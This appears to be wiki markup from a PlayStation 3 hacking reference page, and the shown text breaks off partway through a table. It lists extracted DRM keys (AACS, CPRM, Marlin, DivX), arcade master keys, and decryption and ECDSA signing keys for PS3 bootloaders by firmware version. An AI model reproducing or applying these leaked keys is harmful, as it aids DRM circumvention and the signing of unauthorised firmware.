[[Keys#sc_iso_module_1.00-4.00|sc_iso_module_1.00-4.00]]&lt;br /&gt;<br /> [http://www.ps3hax.net/showthread.php?t=68857&amp;p=721426 source]<br /> <br /> == AACS key/iv ==<br /> <br /> aes-256-ctr_key:<br /> 995FE3C3AB857BFCD853F1ABE796799D0E2093B2F7E094AE39CD88A2AC879F96<br /> aes-256-ctr iv:<br /> 802794556C7716719B40A175DB9A455E<br /> [[http://pastebin.com/kasHaXKp Another decrypted arrays with this key]]<br /> <br /> <br /> magic: FolkloreJam<br /> <br /> key:<br /> 2DC2DF39420321D0CEF1FE2374029D95<br /> iv:<br /> 0BA0F8DDFEA61FB3D8DF9F566A050F78<br /> <br /> new magic: CODEFACE<br /> <br /> public key 1 enc:<br /> 453C8B51307C4D15621C5D9D23D35BC3CE5F34136825B970130CFCCE0799F03D66004B25CF3EB6E2<br /> public key 1 dec:<br /> 63C21DFFB2B2798A13B58D61166C4E4AAC8A0772137EC638818FD98FA4C30B996728BF4B917F6A27<br /> public key 2 enc:<br /> 5EB2636DE15990A675AF74634DBFD2F48BD9802D7B468C231DADEAC26EB4B82B7EF900EE3193D122<br /> public key 2 dec:<br /> 784CF5C36397A4390406A49F7800C77DE90CB34C001DF36B8F2ECF83CDEE438F7FD1F4806FD20DE7<br /> public key 3 enc:<br /> 26FE96AE82CE349F71A9D0FC35BF158962D533617B5B7F4892832541A35AFBA40128F46E5E41DCC5<br /> public key 3 dec:<br /> 00000000000000000000000000000000000000000000000000000000000000000000000000000000<br /> <br /> Curve:<br /> &lt;pre&gt;<br /> p = 9DC9D81355ECCEB560BDB09EF9EAE7C479A7D7DF<br /> a = 9DC9D81355ECCEB560BDB09EF9EAE7C479A7D7DC<br /> b = 402DAD3EC1CBCD165248D68E1245E0C4DAACB1D8<br /> N = 009DC9D81355ECCEB560BDC44F54817B2C7F5AB017<br /> Gx = 2E64FC22578351E6F4CCA7EB81D0A4BDC54CCEC6<br /> Gy = 0914A25DD05442889DB455C7F23C9A0707F5CBB9<br /> &lt;/pre&gt;<br /> <br /> Second aes-256-ctr_key:<br /> 6634510EF3D58392B8689C487AEC8CF2AC90663B354D580B90FB98FE7DB5C384<br /> Second aes-256-ctr iv:<br /> BC0D7738D332B780A6F89ED022745F0A<br /> <br /> == CPRM ==<br /> Decryption key for obfuscated arrays:<br /> <br /> Key 688D8FECC3AAB50AAE45506B41A48BC3<br /> IV 6AC5B2F7055C031AE36BA31D285D24E5<br /> <br /> Decrypted array 1:<br /> 3AD09AB6F5C116B758F6EDE6D98C57FC<br /> FD4B9B470E8EFFF3BBBA0A8015D72B36<br /> 6A435A89B45D71198FA088B8E88AC3AE<br /> 7C4E3DB596CC21001A6B12DB1FE4119D<br /> D39368B07F3B52B994DDA51B466031EC<br /> C9F8E95E1398BF27560891E36F2040B2<br /> 2CCE0210E018D56CDECD8779AFA92650<br /> F233926EC03F3941AA5B7D2403D62FEB<br /> 0B99864C51458D2EEF077BE24D7AFE25<br /> 5C29A2A8B1F0B3C4307E6338CBF44FD1<br /> DF4432DC175F662A819E774A656734FA<br /> 541E14BE04F1A79C8B37EE85AB220F69<br /> C5D40584A47342A164E1708390C2480D<br /> 611CC672FB7674E701D8C8D275A3CF28<br /> 821D4935C7BDCAA6AC0C62ADF93CEA2D<br /> 59DA3E976D09F755E523539F06BC9578<br /> <br /> Decrypted array 2:<br /> 009153EE3EC7524B0000000000000000<br /> <br /> == AV CC Multi ==<br /> <br /> 942C152C1C2C9D2C94AE15AE1CAE9DAE<br /> <br /> == Archive keys ==<br /> <br /> FA72CEEF59B4D2989F111913287F51C7 generic key<br /> <br /> EA02CEEF5BB4D2998F611910D77F51C6 per console key<br /> <br /> == Marlin DRM ==<br /> <br /> DES key/iv? 7563686979616D61 <br /> <br /> KeyRing SHA1 Seed? DAAA8CE98DFA1563A5E3E27FBBCF6443<br /> <br /> == DivX DRM ==<br /> <br /> Key 0678CE0EC45DA9554D2CDA549B91BC1C<br /> <br /> == Arcade Master Key ==<br /> <br /> Key 359F59BB8C256B91093A92007203ABB33BADF5AC09A0DC005859D6F159C4F54F<br /> IV 929214D8FCCB4CE7099ACEBDFC6612B9<br /> <br /> * used for encrypting Arcade/SYSDB ENCDEC/ATA Seeds<br /> * located at Lv1Ldr<br /> <br /> == Arcade ATA Decryption Key ==<br /> <br /> Key 5F20A21ED12FF6425B62FDE0D1881C8464131BE76B28CE9A<br /> IV 00000000000000000000000000000000<br /> <br /> * algo is aes-192-cbc, used for System 357A (GECR-1100)<br /> * Key forged by encrypting Arcade ATA Seeds with Master Key<br /> <br /> == Modules ==<br /> <br /> ==== Notes ====<br /> * in CEB Ebootroms, Sony uses the same 256bits keysets for self/rvk (lv0 uses lv1 keyset) than the ones initially available until 3.30 with a broken aes256ctr (yes, they use a 256bit key)<br /> * With Ebootroms themselves, only the first half is used on ceb2010-2060 ebootroms <br /> * Likewise, the individual_info erk is 256 bit size, but only first half is used.<br /> <br /> <br /> ''A '-' means that the cell is empty, because the version does not matter or the private key cannot be calculated (see 3.56 and later below) like has been done in 3.55 and earlier. See also : http://www.mhlavac.info/wp-content/uploads/downloads/2010/03/lec2.pdf<br /> <br /> * &amp;lt;= 3.55:<br /> ** Randomfail present, thus when private key is unknown: use scekrit ;<br /> ** No obfuscation added to loaders yet, thus keytable as seen inside loader are the keys used by crypto engine (in SPU, or key as used by en/decryption tools like scetool)<br /> * 3.56:<br /> ** Fixed the randomfail in 3.56 and later after the fail0verflow presentation at 27C3, thus scekrit is of no use, see also: [http://www.instructables.com/id/Understanding-how-ECDSA-protects-your-data/?ALLSTEPS] ;<br /> ** No obfuscation added to loaders ''yet''<br /> * =&amp;gt;3.60:<br /> ** fixed the randomfail since 3.56, thus scekrit is of no use ;<br /> ** Obfuscation of keytable was added since 3.60 see [[Keys#Key_Scrambling|Key Scrambling]], which used [[Undocumented SPU Channels|ch72]] ringbuffer seed for deobfuscation.<br /> *** &quot;dec&quot; in ldr table refers to the deobfuscated key as used by crypto engine ;<br /> *** &quot;enc&quot; in ldr table refers to the obfuscated key as seen directly inside the decrypted loader keytable<br /> <br /> ===Lv0Ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-key for decrypting<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv0ldr&lt;br /&gt;(Internal) || - ({{SD}}) || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-&lt;!--// key for decrypting lv0, inside lv0ldr //--&gt;<br /> | lv0ldr || 0.60+ || &lt;code&gt;CA7A24EC38BDB45B98CCD7D363EA2AF0C326E65081E0630CB9AB2D215865878A&lt;/code&gt; || &lt;code&gt;F9205F46F6021697E670F13DFA726212&lt;/code&gt; || &lt;code&gt;A8FD6DB24532D094EFA08CB41C9A72287D905C6B27B42BE4AB925AAF4AFFF34D41EEB54DD128700D&lt;/code&gt; || &lt;code&gt;001AD976FCDE86F5B8FF3E63EF3A7F94E861975BA3&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> |-&lt;!--// key for decrypting lv0, inside lv0ldr //--&gt;<br /> | lv0ldr || 030.001-050.013 ({{CEB}}) || &lt;code&gt;B9F3F9E6107CFF2680A91E118C2403CF4A6F18F3C7EFD7D13D1AC4DB760BD222&lt;/code&gt; || &lt;code&gt;B43661B9A79BAD9D8E2B046469CDA1E7&lt;/code&gt; || &lt;code&gt;4C870BE86DDD996A92A3F7F404F33604244A1D02AB5B78BC9DAF030B78BE8867CF586171B7D45D20&lt;/code&gt; || &lt;code&gt;002CC736C7AD06D264E9AB663EB1F35F5DC159248C&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===MetLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | metldr&lt;br /&gt;(Internal) || - ({{SD}}) || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | metldr || - || &lt;code&gt;C0CEFE84C227F75BD07A7EB846509F93B238E770DACB9FF4A388F812482BE21B&lt;/code&gt; || &lt;code&gt;47EE7454E4774CC9B8960C7B59F4C14D&lt;/code&gt; || &lt;code&gt;C2D4AAF319355019AF99D44E2B58CA29252C89123D11D6218F40B138CAB29B7101F3AEB72A975019&lt;/code&gt; || &lt;code&gt;00C5B2BFA1A413DD16F26D31C0F2ED4720DCFB0670&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Lv1ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv1ldr&lt;br /&gt;(Internal) || {{SD}} 0.80 || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | lv1ldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573&lt;/code&gt; || &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv1ldr || 030.001-3.31 || &lt;code&gt;B9F3F9E6107CFF2680A91E118C2403CF4A6F18F3C7EFD7D13D1AC4DB760BD222&lt;/code&gt; || &lt;code&gt;B43661B9A79BAD9D8E2B046469CDA1E7&lt;/code&gt; || &lt;code&gt;4C870BE86DDD996A92A3F7F404F33604244A1D02AB5B78BC9DAF030B78BE8867CF586171B7D45D20&lt;/code&gt; || &lt;code&gt;002CC736C7AD06D264E9AB663EB1F35F5DC159248C&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.40-3.42 || &lt;code&gt;B880593856C8C6D2037585626A12977F50DCFCF3F132D2C89AA6E670EAFC1646&lt;/code&gt; || &lt;code&gt;A79B05D4E37B8117A95E6E7C14FB640E&lt;/code&gt; || &lt;code&gt;7454C7CCBFC2F66C142D78A730A3A6F973CC0FB75A46FCBB390790138910A0CAC78E5E21F4DA3375&lt;/code&gt; || &lt;code&gt;00033A699FDD2DA6CDD6CCC03B2C6145F998706F74&lt;/code&gt; || &lt;code&gt;0x34&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.50 || &lt;code&gt;1E8EEEA9E80A729F3FA52CF523B25941EA44B4155D94E5DADC5C5A77847620C7&lt;/code&gt; || &lt;code&gt;E034D31A80316960024D1B3D3164FDC3&lt;/code&gt; || &lt;code&gt;7E3A196f4A5879F3A7B091A2263F7C24E1716129B580566D308D9C2254B36AEE53DEF30EC85F8398&lt;/code&gt; || &lt;code&gt;005815D17125D04C33790321DE29EB6241365100B5&lt;/code&gt; || &lt;code&gt;0x35&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.55 || &lt;code&gt;53ABDF84BE08B0351B734F2B97D2BE1621BC6C889E4362E5C70F39D6C3ED9F23&lt;/code&gt; || &lt;code&gt;44E652661AC7584DBE08ECB810FB5FC0&lt;/code&gt; || &lt;code&gt;733198A7759BC07326755BC9773A8A17C8A7043C7BDAB83D88E230512E2EA3852D7DA4263A7E97F9&lt;/code&gt; || &lt;code&gt;004312C65347ACBE95CC306442FEFD0AF4C2935EB3&lt;/code&gt; || &lt;code&gt;0x05&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.56 || &lt;code&gt;48793EBDDA1AF65D737DA2FDA2DD104447A698F8A82CAAEE992831711BA94E83&lt;/code&gt; || &lt;code&gt;15DCF3C67147A45D09DE7521EECA07A1&lt;/code&gt; || &lt;code&gt;85A8868C320127F10B6598964C69221C086702021D31803520E21FDE4DBE827766BE41825CB7328C&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60-3.61 || &lt;code&gt;5FF17D836E2C4AD69476E2614F64BDD05B9115389A9A6D055B5B544B1C34E3D5&lt;/code&gt; || &lt;code&gt;DF0F50EC3C4743C5B17839D7B49F24A4&lt;/code&gt; || &lt;code&gt;1CDABE30833823F461CA534104115FFF60010B710631E435A7D915E82AE88EDE667264656CB7062E&lt;/code&gt; || - || &lt;code&gt;0x05&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.65-3.66 || &lt;code&gt;BD0621FA19383C3C72ECBC3B008F1CD55FFD7C3BB7510BF11AD0CF0FC2B70951&lt;/code&gt; || &lt;code&gt;569AF3745E1E02E3E288273CDE244CD8&lt;/code&gt; || &lt;code&gt;21E26F11C2D69478609DD1BD278CDFC940D90386455BA52FCD1FA7E27AC2AFA826C79A10193B625C&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.70-3.74 || &lt;code&gt;41A6E0039041E9D8AAF4EF2F2A2971248EDBD96A3985611ED7B4CE73EE4804FE&lt;/code&gt; || &lt;code&gt;C8C98D5A5CE23AF5607A352AECACB0DC&lt;/code&gt; || &lt;code&gt;4389664390265F96C1A882374C0F856364E33DB09BE124A4666F9A12F0DD9C811EDD55BA21ED0667&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.00-4.11 || &lt;code&gt;557EDF6C063F3272B0D44EEC12F418DA774815B5415597CC5F75C21E048BAD74&lt;/code&gt; || &lt;code&gt;7144D7574937818517826227EF4AC0B4&lt;/code&gt; || &lt;code&gt;085D38DBF9B757329EB862107929909D32FA1DAE60641BF4AC25319D7650597EE977F8E810FEEA96&lt;/code&gt; || - || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.20-{{latest}} || &lt;code&gt;10CEA04973FCCC12EC19924510822D8D4C41F657FD3D7E73F415A8D687421BCD&lt;/code&gt; || &lt;code&gt;ED8699562C6AC65204FA166257E7FCF4&lt;/code&gt; || &lt;code&gt;9AF86FC869C159FBB62F7D9674EE257ABF12E5A96D5875B4AA73C13C2BC13E2A4079F98B9B935EE2&lt;/code&gt; || - || &lt;code&gt;0x14&lt;/code&gt;<br /> |}<br /> <br /> ===Lv2Ldr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | lv2ldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573&lt;/code&gt; || &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv2ldr || 030.001-3.31 || &lt;code&gt;94303F69513572AB5AE17C8C2A1839D2C24C28F65389D3BBB11894CE23E0798F&lt;/code&gt; || &lt;code&gt;9769BFD187B90990AE5FEA4E110B9CF5&lt;/code&gt; || &lt;code&gt;AFAF5E96AF396CBB69071082C46A8F34A030E8EDB799E0A7BE00AA264DFF3AEBF7923920D559404D&lt;/code&gt; || &lt;code&gt;0070ABF9361B02291829D479F56AB248203CD3EB46&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.40-3.42 || &lt;code&gt;575B0A6C4B4F2760A03FE4189EBAF4D947279FD982B14070349098B08FF92C10&lt;/code&gt; || &lt;code&gt;411CB18F460CE50CAF2C426D8F0D93C8&lt;/code&gt; || &lt;code&gt;3FEE313954CB3039C321A7E33B97FFDEC8988A8B55759161B04DBF4731284E4A8191E3F17D32B0EA&lt;/code&gt; || &lt;code&gt;0073076441A08CD179E5FACE349B86DA58B5B7BA78&lt;/code&gt; || &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.50 || &lt;code&gt;6DBD48D787C58803A8D724DA5ACF04FF8FCE91D7545D2322F2B7ABF57014AF68&lt;/code&gt; || &lt;code&gt;603A36213708520ED5D745DEC1325BA5&lt;/code&gt; || &lt;code&gt;5888CB83AC3CCA9610BC173C53141C0CA58B93719E744660CA8823D5EAEE8F9BF736997054E4B7E3&lt;/code&gt; || &lt;code&gt;0009EBC3DE442FA5FBF6C4F3D4F9EAB07778A142BD&lt;/code&gt; || &lt;code&gt;0x22&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.55 || &lt;code&gt;84015E90FA23139628A3C75CC09714E6427B527A82D18ABC3E91CD8D7DDAFF17&lt;/code&gt; || &lt;code&gt;5B240444D645F2038118F97FD5A145D5&lt;/code&gt; || &lt;code&gt;B266318245266B2D33641CD8A864066D077FAC60B7E27399099A70A683454B70F9888E7CC0C2BF72&lt;/code&gt; || &lt;code&gt;009D4CBA2BFB1A8330D3E20E59D281D476D231C73A&lt;/code&gt; || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.56 || &lt;code&gt;EAE15444048EFDE7A831BFA9F5D96F047C9FCFF50723E292CF50F5417D81E359&lt;/code&gt; || &lt;code&gt;9CA9282DC7FA9F315EF3156D970B7CD4&lt;/code&gt; || &lt;code&gt;0D58938CB47598A6A672874F1768068F8B80D8D17014D2ABEBAC85E5B0993D9FB6F307DDC3DDA699&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60-3.61 || &lt;code&gt;88AD367EDEC2FEED3E2F99B1C685075C41BDEC90C84F526CAF588F89BBD1CBCC&lt;/code&gt; || &lt;code&gt;8D18E8E525230E63DE10291C9DD615BF&lt;/code&gt; || &lt;code&gt;86EED1D65E58890ABDA9ACA486A2BDDB9C0A529C2053FAE301F0F698EAF443DA0F60595A597A7027&lt;/code&gt; || - || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65-3.66 || &lt;code&gt;688D5FCAC6F4EA35AC6AC79B10506007286131EE038116DB8AA2C0B0340D9FB0&lt;/code&gt; || &lt;code&gt;75E0239D18B0B669EAE650972F99726B&lt;/code&gt; || &lt;code&gt;008E1C820AC567D1BFB8FE3CC6AD2E1845A1D1B19ED2E18B18CA34A8D28A83EC60C63859CDB3DACA&lt;/code&gt; || - || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70-3.74 || &lt;code&gt;E81C5B04C29FB079A4A2687A39D4EA97BFB49D80EF546CEB292979A5F77A6254&lt;/code&gt; || &lt;code&gt;15058FA7F2CAD7C528B5F605F6444EB0&lt;/code&gt; || &lt;code&gt;438D0E5C1E7AFB18234DB6867472FF5F52B750F30C379C7DD1EE0FD23E417B3EA819CC01BAC480ED&lt;/code&gt; || - || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.00-4.11 || &lt;code&gt;A1E4B86ED02BF7F1372A2C73FE02BC738907EB37CE3BA605FE783C999FAFDB97&lt;/code&gt; || &lt;code&gt;BBE7799B9A37CB272E386618FDFD4AEC&lt;/code&gt; || &lt;code&gt;5B31A8E2A663EBD673196E2E1022E0D64988C4E1BBFE5E474415883A3BA0D9C562A2BE9C30E9B4A8&lt;/code&gt; || - || &lt;code&gt;0x07&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.20-{{latest}} || &lt;code&gt;0CAF212B6FA53C0DA7E2C575ADF61DBE68F34A33433B1B891ABF5C4251406A03&lt;/code&gt; || &lt;code&gt;9B79374722AD888EB6A35A2DF25A8B3E&lt;/code&gt; || &lt;code&gt;1034A6F98AF6625CC3E3604B59B971CA617DF337538D2179EBB22F3BDC9D0C6DA56BA7DDFD205A50&lt;/code&gt; || - || &lt;code&gt;0x14&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===IsoLdr===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! Revision !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | isoldr&lt;br /&gt;(Internal) || {{SD}} 0.80-3.31 || 0x01 ||&lt;code&gt;9E85BEE6D39E9632A77FE3CD6E647C8DFE4606C383E1697DD6D9CE63341EAFF9&lt;/code&gt; || &lt;code&gt;2C1F4C82FF3A796D3A772CEEF010ECA4&lt;/code&gt; || &lt;code&gt;625D1DF4C3264BBA9FC17A4437BA42591585A5ECCC6F3042DB3A80CBBC0426DAF33549C537AA7782&lt;/code&gt; || &lt;code&gt;00D19A1B338041F7C31062B9C40E725E1DA5D7C11A&lt;/code&gt; || &lt;code&gt;0x20&lt;/code&gt;<br /> |-<br /> | isoldr || 0.80-3.31 || 0x01 || &lt;code&gt;8860D0CFF4D0DC688D3223321B96B59A777E6914961488E07048DAECB020ECA4&lt;/code&gt; || &lt;code&gt;C82D015D46CF152F1DD0C16F18B5B1E5&lt;/code&gt; || &lt;code&gt;733918D7C888130509346E6B4A8B6CAA357AB557E814E8122BF102C14A314BF9475B9D70EAF9EC29&lt;/code&gt; || &lt;code&gt;009BE892E122A5C943C1BB7403A67318AA9E1B286F&lt;/code&gt; || &lt;code&gt;0x36&lt;/code&gt;<br /> |-<br /> | isoldr || 3.40-3.42 || 0x01 || &lt;code&gt;101E27F3FA2FB53ACA924F783AD553162D56B975D05B81351A1111799F20254D&lt;/code&gt; || &lt;code&gt;8D2E9C6297B8AD252998458296AC773C&lt;/code&gt; || &lt;code&gt;138446EE0BDDA5638F97328C8956E6489CBBFE57C5961D40DD5C43BB4138F1C400A8B27204A5D625&lt;/code&gt; || &lt;code&gt;00849DBC57D3B92F01864E6E82EB4EF0EF6311E122&lt;/code&gt; || &lt;code&gt;0x32&lt;/code&gt;<br /> |-<br /> | isoldr || 3.50 || 0x01 || &lt;code&gt;3F2604FA27AEADFBE1AC69EB00BB16EF196C2193CBD62900FFD8C25041680843&lt;/code&gt; || &lt;code&gt;A414AC1DB7987E43777651B330B899E1&lt;/code&gt; || &lt;code&gt;1F4633AFDE18614D6CEF38A2FD6C4CCAC7B6EB8109D72CD066ECEBA0193EA3F43C37AE83179A4E5F&lt;/code&gt; || &lt;code&gt;0085B4B05DEBA7E6AD831653C974D95149803BB272&lt;/code&gt; || &lt;code&gt;0x33&lt;/code&gt;<br /> |-<br /> | isoldr || 3.55 || 0x01 || &lt;code&gt;BDB74AA6E3BA2DC10B1BD7F17198399A158DBE1FA0BEA68C90FCACBE4D04BE37&lt;/code&gt; || &lt;code&gt;0207A479B1574F8E7F697528F05D5435&lt;/code&gt; || &lt;code&gt;917E1F1DC48A54EB5F10B38E7569BB5383628A7C906F0DCA62FDA33805C15FAB270016940A09DB58&lt;/code&gt; || &lt;code&gt;00294411363290975BA551336D3965D88AF029A17B&lt;/code&gt; || &lt;code&gt;0x03&lt;/code&gt;<br /> |-<br /> | isoldr || 3.56 || 0x01 || &lt;code&gt;311C015F169F2A1E0757F7064B14C7C9F3A3FFEE015BD4E3A22401A2667857CE&lt;/code&gt; || &lt;code&gt;7BB8B3F5AC8E0890E3148AE5688C7350&lt;/code&gt; || &lt;code&gt;3F040EFA2335FED5670BA4D5C3AB2D9D0B4BA69D154A0062EA995A7D21DBAF0DC5A0DAD333D1C1DD&lt;/code&gt; || - || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | isoldr || 3.60-3.61 || 0x01 || &lt;code&gt;8474ADCA3B3244931EECEB9357841442442A1C4A4BCF4E498E6738950F4E4093&lt;/code&gt; || &lt;code&gt;FFF9CACCC4129125CAFB240F419E5F39&lt;/code&gt; || &lt;code&gt;098E1A53E59A95316B00D5A29C05FFEBAE41D1A8A386F9DA96F98858FD25E07BB7A3BC96A5D5B556&lt;/code&gt; || - || &lt;code&gt;0x03&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65-3.66 || 0x01 || &lt;code&gt;E6A21C599B75696C169EC02582BDA74A776134A6E05108EA701EC0CA2AC03592&lt;/code&gt; || &lt;code&gt;D292A7BD57C0BB2EABBCA1252FA9EDEF&lt;/code&gt; || &lt;code&gt;2ED078A13DC4617EB550AD06E228C83C142A2D588EB5E729402D18038A14842FD65B277DCAD225A5&lt;/code&gt; || - || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70-3.74 || 0x01 || &lt;code&gt;072D3A5C3BDB0D674DE209381432B20414BC9BDA0F583ECB94BD9A134176DD51&lt;/code&gt; || &lt;code&gt;8516A81F02CF938740498A406C880871&lt;/code&gt; || &lt;code&gt;5A778DEB5C4F12E8D48E06A2BBBBE3C90FA8C6C47DF9BDB5697FD4A8EB7941CE3F59A557E81C787D&lt;/code&gt; || - || &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70-3.74 || 0x0100 || &lt;code&gt;786FAB8A0B89474A2CB80B3EA104CCCB9E13F66B45EC499BB31865D07C661EA8&lt;/code&gt; || &lt;code&gt;94662F13D99A9F5D211C979FFDF65FE3&lt;/code&gt; || &lt;code&gt;912C94C252B7799CEB45DFBB73EF7CAD9BCC0793A3331BBB79E3C47C0F5C782F698065A8D4DB0D8B&lt;/code&gt; || - || &lt;code&gt;0x0E&lt;/code&gt;<br /> |-<br /> | isoldr || 4.00-4.11 || 0x01 || &lt;code&gt;4262657A3185D9480F82C8BD2F81766FCC2C8FD7DD5EBE8657B00B939E0C75BD&lt;/code&gt; || &lt;code&gt;4F1E3EF07D893A4714B1B3D5A4E50479&lt;/code&gt; || &lt;code&gt;4DBFCFA68B52F1D66E09AFA6C18EC65479EDBD027B6B8C6A5D85FE5C84D43EA40CEF1672078A0702&lt;/code&gt; || - || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | isoldr || 4.00-4.11 || 0x0100 || &lt;code&gt;16AA7D7C35399E2B1BFAF68CD19D7512A7855029C08BECC4CC3F035DF7F9C70B&lt;/code&gt; || &lt;code&gt;0E50DB6D937D262CB0499136852FCB80&lt;/code&gt; || &lt;code&gt;AEE2795BF295662A50DFAFE70D1B0B6F0A2EBB211E1323A275FC6E2D13BE4F2F10CA34784F4CF1EC&lt;/code&gt; || - || &lt;code&gt;0x0F&lt;/code&gt;<br /> |-<br /> | isoldr || 4.20-{{latest}} || 0x01 || &lt;code&gt;63565DBE98C3B1A52AADC907C47130FE57A10734E84F22592670F86ED2B0A086&lt;/code&gt; || &lt;code&gt;953F6A99891B4739358F5363A00C08B9&lt;/code&gt; || &lt;code&gt;26BE7B02E7D65C6C21BF4063CDB8C0092FE1679D62FA1A8CCC284A1D21885473A959992537A06612&lt;/code&gt; || - || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | isoldr || 4.20-{{latest}} || 0x0100 || &lt;code&gt;B96EA32CB96EA32DB96EA32CB96EA32CB96EA32CB96EA32DB96EA32CB96EA32C&lt;/code&gt; || &lt;code&gt;B96EA32CB96EA32DB96EA32DB96EA32C&lt;/code&gt; || &lt;code&gt;2D7066E68C6AC3373B1346FD76FE7D18A207C811500E65D85DB57BC4A27AD78F59FD53F38F50E151&lt;/code&gt; || - || &lt;code&gt;0x02&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Spp verifier===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | spp_verifier&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | spp_verifier || 0.80-3.55 || &lt;code&gt;56C655747A4B6957A2D8BB9AC605C297E6AC9871932BFECDDE066CEE5B29470A&lt;/code&gt; || &lt;code&gt;007E6B268EF1E986D10A9889CF93A8CB&lt;/code&gt; || 